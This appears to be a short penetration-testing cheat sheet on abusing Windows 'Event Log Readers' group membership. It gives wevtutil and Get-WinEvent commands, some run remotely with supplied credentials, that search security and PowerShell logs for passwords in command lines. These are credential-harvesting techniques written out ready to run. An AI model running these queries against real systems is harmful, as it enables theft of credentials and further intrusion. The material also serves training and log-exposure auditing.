Exploiting Event Log Readers Group for Security Log Access

Verify Group Membership:

net localgroup "Event Log Readers"

Check if the user is a member of the "Event Log Readers" group.

Identify Audit Settings:

Determine if process creation auditing (Event ID 4688) and command-line logging are enabled.

Query Security Logs using wevtutil:

wevtutil qe Security /rd:true /f:text | Select-String "/user"

Search for credential usage in the security logs.

wevtutil qe Security /rd:true /f:text /r:<remote_host> /u:<user> /p:<password> | findstr "/user"

Remotely query security logs with credentials.

Query Security Logs using Get-WinEvent:

Get-WinEvent -LogName security | Where-Object { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}

Search for credential usage in process creation events.

Get-WinEvent -LogName security -Credential <PSCredential> | Where-Object { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}

Remote query using specific credentials.

Explore PowerShell Operational Logs:

Examine the PowerShell Operational log for sensitive information if script block or module logging is enabled.

Commands:

• net localgroup "Event Log Readers"

• wevtutil qe Security

• findstr

PowerShell Cmdlets:

• Get-WinEvent

• Select-String

• Where-Object

Techniques:

• Leverage "Event Log Readers" group membership to access security logs.

• Search for sensitive information (credentials, command-line parameters) within event logs.

• Use wevtutil and Get-WinEvent to query and filter event log data.

• Explore PowerShell Operational logs for potential credential leaks.

• Understand the importance of process creation auditing and command-line logging.